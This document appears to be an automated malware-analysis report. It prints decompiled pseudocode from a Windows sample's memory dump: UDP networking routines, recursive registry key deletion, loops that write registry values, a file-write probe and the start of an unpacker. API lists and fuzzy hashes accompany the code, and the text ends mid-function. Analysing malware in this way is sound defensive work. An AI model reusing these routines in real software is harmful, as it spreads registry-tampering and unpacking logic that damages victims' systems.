                                											if((_v4228 & 0x0000ffff) == (_t111 & 0x0000ffff)) {
                                												__eflags = _v4224 - 4;
                                												if(_v4224 == 4) {
                                													__eflags = _v4218 - 0x4f;
                                													if(_v4218 == 0x4f) {
                                														__eflags = _v4217 - 0x4b;
                                														if(_v4217 == 0x4b) {
                                															_v4236 = _v4223;
                                															E0221772B(_a8,  &_v4236, "true");
                                															_t170 = _t169 + 0xc;
                                															_v4240 = 0xc;
                                															__eflags = _v4216 - 0xfffffffe;
                                															if(_v4216 == 0xfffffffe) {
                                																__eflags = _v4215 - 0xfffffffe;
                                																if(_v4215 == 0xfffffffe) {
                                																	_t138 = _v4214;
                                																	__eflags = _v4214 - 0xfffffffe;
                                																	if(_v4214 == 0xfffffffe) {
                                																		__eflags = _v4213 - 0xfffffffe;
                                																		if(__eflags == 0) {
                                																			E02206330(_t138, __eflags,  &_v4208, 0);
                                																			_t170 = _t170 + 8;
                                																			_v4240 = 0x10;
                                																		}
                                																	}
                                																}
                                															}
                                															__eflags = _a12;
                                															if(_a12 != 0) {
                                																_v4236 =  *((intOrPtr*)(_t164 + _v4240 - 0x1080));
                                																E0221772B(_a12,  &_v4236, "true");
                                															}
                                															_v4244 = 1;
                                														}
                                													}
                                												}
                                											}
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                			}




































                                0x022071a3
                                0x022071aa
                                0x022071be
                                0x022071be
                                0x022071c0
                                0x022071c2
                                0x022071c3
                                0x022071cd
                                0x022071d7
                                0x022071e1
                                0x022071ed
                                0x022071f3
                                0x02207203
                                0x02207209
                                0x0220720f
                                0x02207216
                                0x022074fd
                                0x02207504
                                0x0220750d
                                0x0220750d
                                0x00000000
                                0x02207513
                                0x02207225
                                0x02207235
                                0x0220723a
                                0x0220723d
                                0x0220724a
                                0x00000000
                                0x00000000
                                0x0220726d
                                0x02207276
                                0x0220727c
                                0x02207286
                                0x02207290
                                0x0220729a
                                0x022072a4
                                0x022072a4
                                0x022072ae
                                0x022072bf
                                0x022072cb
                                0x022072f2
                                0x02207309
                                0x02207319
                                0x02207319
                                0x022072e4
                                0x022072b6
                                0x022072b6
                                0x022072b9
                                0x00000000
                                0x022072b9
                                0x02207321
                                0x0220732f
                                0x02207330
                                0x02207332
                                0x0220733a
                                0x02207344
                                0x0220734d
                                0x0220737a
                                0x02207380
                                0x02207387
                                0x0220738d
                                0x02207397
                                0x0220739d
                                0x022073a4
                                0x022073b6
                                0x022073bc
                                0x022073c2
                                0x022073d7
                                0x022073dc
                                0x022073e6
                                0x022073e9
                                0x0220740a
                                0x0220740f
                                0x02207417
                                0x02207419
                                0x02207426
                                0x02207429
                                0x02207436
                                0x02207439
                                0x02207446
                                0x02207449
                                0x02207455
                                0x02207468
                                0x0220746d
                                0x02207470
                                0x02207481
                                0x02207484
                                0x0220748d
                                0x02207490
                                0x02207492
                                0x02207499
                                0x0220749c
                                0x022074a5
                                0x022074a8
                                0x022074b3
                                0x022074b8
                                0x022074bb
                                0x022074bb
                                0x022074a8
                                0x0220749c
                                0x02207490
                                0x022074c5
                                0x022074c9
                                0x022074d8
                                0x022074eb
                                0x022074f0
                                0x022074f3
                                0x022074f3
                                0x02207449
                                0x02207439
                                0x02207429
                                0x02207419
                                0x022073e9
                                0x022073bc
                                0x022073a4
                                0x02207397
                                0x02207387
                                0x0220734d

                                APIs
                                • socket.WS2_32(00000002,00000002,00000011), ref: 02207203
                                • sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0220726D
                                • select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 02207345
                                • recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 02207374
                                • closesocket.WS2_32(?), ref: 0220750D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: closesocketrecvfromselectsendtosocket
                                • String ID: @
                                • API String ID: 4198204009-2766056989
                                • Opcode ID: 5dede0f5e827a0623b330deb5f1e36961d74bef5e6cdf09702f73f97e274fb44
                                • Instruction ID: 05f50cfd87134725c55c0628955da62f71e1f4d436fd90342fc469d139d289fb
                                • Opcode Fuzzy Hash: 5dede0f5e827a0623b330deb5f1e36961d74bef5e6cdf09702f73f97e274fb44
                                • Instruction Fuzzy Hash: AC91AF70D142A99EEB28CB64CC90BEDBB75AF44300F5041D9E29DA61C5C7B06EC4CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E02208F51(char* _a4, void* _a8) {
                                				int _v8;
                                				int _v12;
                                				void* _v16;
                                				void _v1039;
                                				char _v1040;
                                				void _v2063;
                                				char _v2064;
                                				long _t43;
                                				long _t46;
                                				long _t48;
                                				CHAR* _t75;
                                				void* _t82;
                                				void* _t84;
                                
                                				_v1040 = 0;
                                				memset( &_v1039, 0, 0xff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v2064 = 0;
                                				memset( &_v2063, 0, 0xff << 2);
                                				_t84 = _t82 + 0x18;
                                				asm("stosw");
                                				asm("stosb");
                                				_t43 = RegOpenKeyExA(_a8, _a4, 0, 0xf003f,  &_v16); // executed
                                				if(_t43 == 0) {
                                					_v8 = 0;
                                					_v12 = 0x104;
                                					while(1) {
                                						_t46 = RegEnumValueA(_v16, _v8,  &_v1040,  &_v12, 0, 0, 0, 0); // executed
                                						if(_t46 != 0) {
                                							break;
                                						}
                                						_v12 = 0x104;
                                						if(_v1040 != 0) {
                                							RegDeleteValueA(_v16,  &_v1040); // executed
                                							_v1040 = 0;
                                							continue;
                                						}
                                						break;
                                					}
                                					_v8 = 0;
                                					_v12 = 0x104;
                                					while(1) {
                                						_t48 = RegEnumKeyExA(_v16, _v8,  &_v1040,  &_v12, 0, 0, 0, 0); // executed
                                						if(_t48 == 0x103) {
                                							break;
                                						}
                                						if(_v1040 != 0) {
                                							_t75 =  *0x21e1c14; // 0x2202f00
                                							wsprintfA( &_v2064, _t75, _a4,  &_v1040);
                                							E02208F51( &_v2064, _a8); // executed
                                							_t84 = _t84 + 0x18;
                                							RegDeleteKeyA(_v16,  &_v1040); // executed
                                							_v12 = 0x104;
                                							_v1040 = 0;
                                							continue;
                                						}
                                						break;
                                					}
                                					return RegCloseKey(_v16);
                                				}
                                				return _t43;
                                			}
















                                0x02208f5b
                                0x02208f6f
                                0x02208f71
                                0x02208f73
                                0x02208f74
                                0x02208f88
                                0x02208f88
                                0x02208f8a
                                0x02208f8c
                                0x02208fa0
                                0x02208fa8
                                0x02208fae
                                0x02208fb5
                                0x02208fbc
                                0x02208fd7
                                0x02208fdf
                                0x00000000
                                0x00000000
                                0x02208fe1
                                0x02208ff1
                                0x02209000
                                0x02209006
                                0x00000000
                                0x02209006
                                0x00000000
                                0x02208ff3
                                0x0220900f
                                0x02209016
                                0x0220901d
                                0x02209038
                                0x02209043
                                0x00000000
                                0x00000000
                                0x0220904e
                                0x0220905d
                                0x0220906b
                                0x0220907f
                                0x02209084
                                0x02209092
                                0x02209098
                                0x0220909f
                                0x00000000
                                0x0220909f
                                0x00000000
                                0x02209050
                                0x00000000
                                0x022090af
                                0x022090b9

                                APIs
                                • RegOpenKeyExA.KERNELBASE(02209F2F,02202E8C,00000000,000F003F,02209F2F), ref: 02208FA0
                                • RegEnumValueA.KERNELBASE(02209F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 02208FD7
                                • RegDeleteValueA.KERNELBASE(02209F2F,00000000), ref: 02209000
                                • RegEnumKeyExA.KERNELBASE(02209F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 02209038
                                • wsprintfA.USER32 ref: 0220906B
                                • RegDeleteKeyA.ADVAPI32(02209F2F,00000000), ref: 02209092
                                • RegCloseKey.ADVAPI32(02209F2F), ref: 022090AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: DeleteEnumValue$CloseOpenwsprintf
                                • String ID:
                                • API String ID: 2321319729-0
                                • Opcode ID: e326cd70ffcb74598a439d680c725f9a2cb0085de4e935131fb1662a7d163286
                                • Instruction ID: 50df0c1e4e9abe143d7392554363a839c1aec02b349f63c1787924d1539baa66
                                • Opcode Fuzzy Hash: e326cd70ffcb74598a439d680c725f9a2cb0085de4e935131fb1662a7d163286
                                • Instruction Fuzzy Hash: 14412FB5A10248FBDB14CBA4CC84FDEB7B9AB48700F108598E309A6185D7745A88CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 60%
                                			E02212EBC() {
                                				void _v263;
                                				char _v264;
                                				void* _v268;
                                				char _v272;
                                				long _t30;
                                				intOrPtr _t32;
                                				void* _t33;
                                				intOrPtr _t35;
                                				char* _t39;
                                				char* _t44;
                                				intOrPtr _t45;
                                				void* _t59;
                                				void* _t60;
                                
                                				_v272 = 0;
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x40 << 2);
                                				_t60 = _t59 + 0xc;
                                				asm("stosw");
                                				asm("stosb");
                                				_t44 =  *0x21e1710; // 0x220244c
                                				_t30 = RegOpenKeyExA(0x80000001, _t44, 0, 0xf003f,  &_v268); // executed
                                				if(_t30 == 0) {
                                					_v272 = 2;
                                					_t39 =  *0x21e1714; // 0x2202488
                                					RegSetValueExA(_v268, _t39, 0, "true",  &_v272, "true"); // executed
                                					RegCloseKey(_v268); // executed
                                				}
                                				_v272 = 0x38;
                                				while(_v272 != 0x3e) {
                                					_t35 =  *0x21e175c; // 0x2202550
                                					E02212E32(0x80000002, _t35,  *((intOrPtr*)(0x21e1680 + _v272 * 4))); // executed
                                					_t60 = _t60 + 0xc;
                                					_v272 = _v272 + 1;
                                				}
                                				_t45 =  *0x21e175c; // 0x2202550
                                				 *0x21e1148( &_v264, _t45);
                                				_t32 =  *0x21e1758; // 0x2202548
                                				_t33 =  *0x21e106c( &_v264, _t32);
                                				_v272 = 0x38;
                                				while(_v272 != 0x3e) {
                                					_t33 = E02212E32(0x80000002,  &_v264,  *((intOrPtr*)(0x21e1680 + _v272 * 4))); // executed
                                					_t60 = _t60 + 0xc;
                                					_v272 = _v272 + 1;
                                				}
                                				return _t33;
                                			}
















                                0x02212ec6
                                0x02212ed0
                                0x02212ee4
                                0x02212ee4
                                0x02212ee6
                                0x02212ee8
                                0x02212ef7
                                0x02212f03
                                0x02212f0b
                                0x02212f0d
                                0x02212f24
                                0x02212f31
                                0x02212f3e
                                0x02212f3e
                                0x02212f44
                                0x02212f5f
                                0x02212f76
                                0x02212f81
                                0x02212f86
                                0x02212f59
                                0x02212f59
                                0x02212f8b
                                0x02212f99
                                0x02212f9f
                                0x02212fac
                                0x02212fb2
                                0x02212fcd
                                0x02212ff0
                                0x02212ff5
                                0x02212fc7
                                0x02212fc7
                                0x02212ffe

                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,0220244C,00000000,000F003F,?,?), ref: 02212F03
                                • RegSetValueExA.KERNELBASE(?,02202488,00000000,?,00000002,?), ref: 02212F31
                                • RegCloseKey.KERNELBASE(?), ref: 02212F3E
                                • lstrcpy.KERNEL32(00000000,02202550), ref: 02212F99
                                • lstrcat.KERNEL32(00000000,02202548), ref: 02212FAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CloseOpenValuelstrcatlstrcpy
                                • String ID: >
                                • API String ID: 1115058322-325317158
                                • Opcode ID: 6c387859b349cd69bf80f38d1170ace55f657a3c0be47d5682dfeb0a987582e6
                                • Instruction ID: ec00811ee7f6a5a60295fd26a65cfae1a92951aeeaab5ca1618e26d61e42de6b
                                • Opcode Fuzzy Hash: 6c387859b349cd69bf80f38d1170ace55f657a3c0be47d5682dfeb0a987582e6
                                • Instruction Fuzzy Hash: 703165B5D50224EBDB20CB94DC45FEAB3B9E765700F0086C9FA4966244C7B45ED4CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 40%
                                			E02210B9A(intOrPtr _a4) {
                                				void _v1027;
                                				char _v1028;
                                				void* _v1032;
                                				void* _t22;
                                				void* _t36;
                                
                                				_v1028 = 0;
                                				memset( &_v1027, 0, 0xff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				 *0x21e1148( &_v1028, _a4);
                                				wsprintfA(_t36 +  *0x21e114c( &_v1028, "%x", GetTickCount()) - 0x400);
                                				_t22 = CreateFileA( &_v1028, 0x40000000, 2, 0, 2, 0x20, 0); // executed
                                				_v1032 = _t22;
                                				if(_v1032 == 0xffffffff) {
                                					return 0;
                                				}
                                				FindCloseChangeNotification(_v1032); // executed
                                				DeleteFileA( &_v1028); // executed
                                				return 1;
                                			}








                                0x02210ba4
                                0x02210bb8
                                0x02210bba
                                0x02210bbc
                                0x02210bc8
                                0x02210bef
                                0x02210c0e
                                0x02210c14
                                0x02210c21
                                0x00000000
                                0x02210c44
                                0x02210c2a
                                0x02210c37
                                0x00000000

                                APIs
                                • lstrcpy.KERNEL32(?,?), ref: 02210BC8
                                • GetTickCount.KERNEL32 ref: 02210BCE
                                • lstrlen.KERNEL32(?,02203D08,00000000), ref: 02210BE1
                                • wsprintfA.USER32 ref: 02210BEF
                                • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 02210C0E
                                • FindCloseChangeNotification.KERNELBASE(?), ref: 02210C2A
                                • DeleteFileA.KERNELBASE(?), ref: 02210C37
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$ChangeCloseCountCreateDeleteFindNotificationTicklstrcpylstrlenwsprintf
                                • String ID:
                                • API String ID: 2157174293-0
                                • Opcode ID: a49393ba4bfcc08de6b9416d0b3f03397005f48959881c890eec17d4cb29f4c8
                                • Instruction ID: 040f7cb6ce82f2daff0004693c37ce62680917fffcbb6456a7d8ef888b63ac70
                                • Opcode Fuzzy Hash: a49393ba4bfcc08de6b9416d0b3f03397005f48959881c890eec17d4cb29f4c8
                                • Instruction Fuzzy Hash: 0A118EB5980208FBDF209BB4DC09FAB77B8BB44704F0049A4B709F6181DA709EDA8F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02212E32(void* _a4, char* _a8, char* _a12) {
                                				void* _v8;
                                				char _v12;
                                				long _t17;
                                				long _t19;
                                
                                				_v12 = 1;
                                				_t17 = RegOpenKeyExA(_a4, _a8, 0, 0xf003f,  &_v8); // executed
                                				if(_t17 == 0) {
                                					RegSetValueExA(_v8, _a12, 0, "true",  &_v12, "true"); // executed
                                					return RegCloseKey(_v8);
                                				}
                                				_t19 = RegCreateKeyA(_a4, _a8,  &_v8); // executed
                                				if(_t19 == 0) {
                                					RegSetValueExA(_v8, _a12, 0, "true",  &_v12, "true"); // executed
                                					return RegCloseKey(_v8);
                                				}
                                				return _t19;
                                			}







                                0x02212e38
                                0x02212e52
                                0x02212e5a
                                0x02212e6e
                                0x00000000
                                0x02212e78
                                0x02212e8c
                                0x02212e94
                                0x02212ea8
                                0x00000000
                                0x02212eb2
                                0x02212ebb

                                APIs
                                • RegOpenKeyExA.KERNELBASE(00000001,?,00000000,000F003F,?), ref: 02212E52
                                • RegSetValueExA.KERNELBASE(?,00000001,00000000,?,00000001,?), ref: 02212E6E
                                • RegCloseKey.ADVAPI32(?), ref: 02212E78
                                • RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 02212E8C
                                • RegSetValueExA.KERNELBASE(?,00000001,00000000,?,00000001,?), ref: 02212EA8
                                • RegCloseKey.ADVAPI32(?), ref: 02212EB2
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CloseValue$CreateOpen
                                • String ID:
                                • API String ID: 2738932338-0
                                • Opcode ID: afcb4401927e6116468ad4e19f2c68f56a6f53ef7f11a004fca283caf3d4f9f8
                                • Instruction ID: d369c273f24097c513357a13304fc96df153cbe91456e50cb23dfcea8685a3ca
                                • Opcode Fuzzy Hash: afcb4401927e6116468ad4e19f2c68f56a6f53ef7f11a004fca283caf3d4f9f8
                                • Instruction Fuzzy Hash: 6F11DAB9A50208FBDB14DFD4DD45FAF77B8AB48B10F104548FB09AB184D670AA54CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 15%
                                			E02204BF9() {
                                				long _t45;
                                				signed int _t54;
                                				void* _t68;
                                
                                				L0:
                                				while(1) {
                                					L0:
                                					 *(_t68 - 0x1110) =  *(_t68 - 0x1110) + 1;
                                					if( *(_t68 - 0x1110) >= 8) {
                                						break;
                                					}
                                					L2:
                                					_t54 = "alfoC:\\Windows\\"; // 0x6f666c61
                                					wsprintfA(_t68 - 0x108, 0x2203c48, _t54 *  *(_t68 - 0x1110));
                                					 *(_t68 - 0x111c) =  *(_t68 - 0x1110);
                                					 *(_t68 - 0x111c) =  *(_t68 - 0x111c) - 1;
                                					if( *(_t68 - 0x111c) <= 6) {
                                						L3:
                                						switch( *((intOrPtr*)( *(_t68 - 0x111c) * 4 +  &M02204D7A))) {
                                							case 0:
                                								L4:
                                								 *(_t68 - 0x1118) =  *( *(_t68 + 8));
                                								goto L11;
                                							case 1:
                                								L5:
                                								__edx =  *((intOrPtr*)(__ebp + 8));
                                								__eax = 0;
                                								 *((intOrPtr*)(__ebp - 0x1118)) = 0;
                                								goto L11;
                                							case 2:
                                								L6:
                                								__ecx =  *((intOrPtr*)(__ebp + 8));
                                								__edx = 0;
                                								 *((intOrPtr*)(__ebp - 0x1118)) = 0;
                                								goto L11;
                                							case 3:
                                								L7:
                                								__eax =  *((intOrPtr*)(__ebp + 8));
                                								__ecx = 0;
                                								 *((intOrPtr*)(__ebp - 0x1118)) = 0;
                                								goto L11;
                                							case 4:
                                								L8:
                                								__edx =  *((intOrPtr*)(__ebp + 8));
                                								__eax =  *((intOrPtr*)(__edx + 8));
                                								 *((intOrPtr*)(__ebp - 0x1118)) =  *((intOrPtr*)(__edx + 8));
                                								goto L11;
                                							case 5:
                                								L9:
                                								__ecx =  *((intOrPtr*)(__ebp + 8));
                                								 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) - 1;
                                								_push( *((intOrPtr*)(__ecx + 8)) - 1);
                                								 *((intOrPtr*)(__ebp + 8)) =  *((intOrPtr*)(__ebp + 8)) + 0xc;
                                								_push( *((intOrPtr*)(__ebp + 8)) + 0xc);
                                								__eax = E02204A5B(__ecx, __eflags);
                                								__esp = __esp + 8;
                                								_push(__eax);
                                								__ecx = __ebp - 0x1108;
                                								_push(__ecx);
                                								__eax =  *0x21e1148();
                                								goto L11;
                                							case 6:
                                								L10:
                                								_push(0x100);
                                								__edx =  *((intOrPtr*)(__ebp + 8));
                                								__edx =  *((intOrPtr*)(__ebp + 8)) + 0x40c;
                                								__eflags = __edx;
                                								_push(__edx);
                                								__eax = E02204A5B(__ecx, __eflags);
                                								__esp = __esp + 8;
                                								_push(__eax);
                                								__eax = __ebp - 0x1108;
                                								_push(__ebp - 0x1108);
                                								__eax =  *0x21e1148();
                                								goto L11;
                                						}
                                					}
                                					L11:
                                					if( *(_t68 - 0x1110) > 5) {
                                						RegSetValueExA( *(_t68 - 0x1114), _t68 - 0x108, 0, 1, _t68 - 0x1108,  *0x21e114c(_t68 - 0x1108)); // executed
                                					} else {
                                						RegSetValueExA( *(_t68 - 0x1114), _t68 - 0x108, 0, "true", _t68 - 0x1118, "true"); // executed
                                					}
                                					L14:
                                				}
                                				L15:
                                				_t45 = RegCloseKey( *(_t68 - 0x1114)); // executed
                                				return _t45;
                                			}






                                0x02204bf9
                                0x02204bf9
                                0x02204bf9
                                0x02204c02
                                0x02204c0f
                                0x00000000
                                0x00000000
                                0x02204c15
                                0x02204c15
                                0x02204c2f
                                0x02204c3e
                                0x02204c4d
                                0x02204c5a
                                0x02204c60
                                0x02204c66
                                0x00000000
                                0x02204c6d
                                0x02204c72
                                0x00000000
                                0x00000000
                                0x02204c7d
                                0x02204c7d
                                0x02204c80
                                0x02204c85
                                0x00000000
                                0x00000000
                                0x02204c8d
                                0x02204c8d
                                0x02204c90
                                0x02204c95
                                0x00000000
                                0x00000000
                                0x02204c9d
                                0x02204c9d
                                0x02204ca0
                                0x02204ca6
                                0x00000000
                                0x00000000
                                0x02204cae
                                0x02204cae
                                0x02204cb1
                                0x02204cb4
                                0x00000000
                                0x00000000
                                0x02204cbc
                                0x02204cbc
                                0x02204cc2
                                0x02204cc5
                                0x02204cc9
                                0x02204ccc
                                0x02204ccd
                                0x02204cd2
                                0x02204cd5
                                0x02204cd6
                                0x02204cdc
                                0x02204cdd
                                0x00000000
                                0x00000000
                                0x02204ce5
                                0x02204ce5
                                0x02204cea
                                0x02204ced
                                0x02204ced
                                0x02204cf3
                                0x02204cf4
                                0x02204cf9
                                0x02204cfc
                                0x02204cfd
                                0x02204d03
                                0x02204d04
                                0x00000000
                                0x00000000
                                0x02204c66
                                0x02204d0a
                                0x02204d11
                                0x02204d5d
                                0x02204d13
                                0x02204d2e
                                0x02204d2e
                                0x02204d63
                                0x02204d63
                                0x02204d68
                                0x02204d6f
                                0x02204d79

                                APIs
                                • wsprintfA.USER32 ref: 02204C2F
                                • lstrcpy.KERNEL32(?,00000000), ref: 02204CDD
                                • lstrcpy.KERNEL32(?,00000000), ref: 02204D04
                                • RegSetValueExA.KERNELBASE(?,?,00000000,?,?,?), ref: 02204D2E
                                • lstrlen.KERNEL32(?), ref: 02204D3D
                                • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000000), ref: 02204D5D
                                • RegCloseKey.KERNELBASE(?), ref: 02204D6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Valuelstrcpy$Closelstrlenwsprintf
                                • String ID: alfoC:\Windows\
                                • API String ID: 3050549977-2437302347
                                • Opcode ID: bae6d13e875d9cd1a5403b3dc60a22daf9e6a93015d4c6107156f07942747e19
                                • Instruction ID: 2281e8d2cbd40ff2fba22a7c0f35ba8017fdee09d372075b6f96fcd90923b756
                                • Opcode Fuzzy Hash: bae6d13e875d9cd1a5403b3dc60a22daf9e6a93015d4c6107156f07942747e19
                                • Instruction Fuzzy Hash: E93117B4D50218EFCB18DF94CC96AD9B7B5EB59701F00C598E70AAB285D670AAC1CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			_entry_(void* __eflags) {
                                				char _v128;
                                				char _v280;
                                				long _v284;
                                				char _t33;
                                				CHAR* _t34;
                                				CHAR* _t35;
                                				char _t36;
                                				char _t37;
                                				signed int _t39;
                                				signed int _t40;
                                				unsigned int _t41;
                                				CHAR* _t51;
                                				signed char* _t56;
                                				long _t57;
                                				char* _t60;
                                				void* _t68;
                                				void* _t70;
                                				void* _t73;
                                				void* _t75;
                                				void* _t77;
                                				void* _t80;
                                				void* _t82;
                                				void* _t84;
                                				void* _t87;
                                				void* _t88;
                                				CHAR* _t104;
                                				char _t106;
                                				char _t107;
                                				char _t108;
                                				char _t109;
                                				intOrPtr* _t112;
                                				CHAR** _t115;
                                				CHAR* _t116;
                                				CHAR* _t117;
                                				CHAR* _t122;
                                				CHAR* _t126;
                                				unsigned int* _t127;
                                				CHAR* _t129;
                                				char* _t130;
                                				void* _t131;
                                				CHAR* _t132;
                                				CHAR* _t134;
                                				unsigned int* _t135;
                                				signed int _t136;
                                				struct HINSTANCE__* _t137;
                                				unsigned int _t138;
                                				DWORD* _t141;
                                				void* _t154;
                                				char _t156;
                                
                                				_t154 = __eflags;
                                				asm("pushad");
                                				_t134 = 0x228d000;
                                				_t1 = _t134 - 0xac000; // 0x21e1000
                                				_t126 = _t1;
                                				_push(_t126);
                                				_t137 = _t136 | 0xffffffff;
                                				while(1) {
                                					_t106 =  *_t134;
                                					_t134 = _t134 - 0xfffffffc;
                                					asm("adc ebx, ebx");
                                					do {
                                						if(_t154 < 0) {
                                							_t33 =  *_t134;
                                							_t134 =  &(_t134[1]);
                                							 *_t126 = _t33;
                                							_t126 =  &(_t126[1]);
                                							__eflags = _t126;
                                							goto L6;
                                						}
                                						_t34 = 1;
                                						while(1) {
                                							_t107 = _t106 + _t106;
                                							if(_t107 == 0) {
                                								_t107 =  *_t134;
                                								_t134 = _t134 - 0xfffffffc;
                                								asm("adc ebx, ebx");
                                							}
                                							asm("adc eax, eax");
                                							_t108 = _t107 + _t107;
                                							_t156 = _t108;
                                							if(_t156 >= 0) {
                                								goto L15;
                                							}
                                							L13:
                                							if(_t156 != 0) {
                                								L21:
                                								_t116 = 0;
                                								_t35 = _t34 - 3;
                                								__eflags = _t35;
                                								if(_t35 < 0) {
                                									_t108 = _t108 + _t108;
                                									__eflags = _t108;
                                									if(__eflags == 0) {
                                										_t108 =  *_t134;
                                										_t134 = _t134 - 0xfffffffc;
                                										asm("adc ebx, ebx");
                                									}
                                									L26:
                                									if(__eflags < 0) {
                                										L18:
                                										_t106 = _t108 + _t108;
                                										__eflags = _t106;
                                										if(_t106 == 0) {
                                											_t106 =  *_t134;
                                											_t134 = _t134 - 0xfffffffc;
                                											asm("adc ebx, ebx");
                                										}
                                										asm("adc ecx, ecx");
                                										L36:
                                										__eflags = _t137 - 0xfffffb00;
                                										asm("adc ecx, 0x2");
                                										_t122 =  &(_t126[_t137]);
                                										__eflags = _t137 - 0xfffffffc;
                                										if(_t137 <= 0xfffffffc) {
                                											do {
                                												_t36 =  *_t122;
                                												_t122 =  &(_t122[4]);
                                												 *_t126 = _t36;
                                												_t126 =  &(_t126[4]);
                                												_t116 = _t116 - 4;
                                												__eflags = _t116;
                                											} while (_t116 > 0);
                                											_t126 =  &(_t126[_t116]);
                                											break;
                                										} else {
                                											goto L37;
                                										}
                                										do {
                                											L37:
                                											_t37 =  *_t122;
                                											_t122 =  &(_t122[1]);
                                											 *_t126 = _t37;
                                											_t126 =  &(_t126[1]);
                                											_t116 = _t116 - 1;
                                											__eflags = _t116;
                                										} while (_t116 != 0);
                                										break;
                                									}
                                									_t116 =  &(_t116[1]);
                                									_t108 = _t108 + _t108;
                                									__eflags = _t108;
                                									if(__eflags == 0) {
                                										_t108 =  *_t134;
                                										_t134 = _t134 - 0xfffffffc;
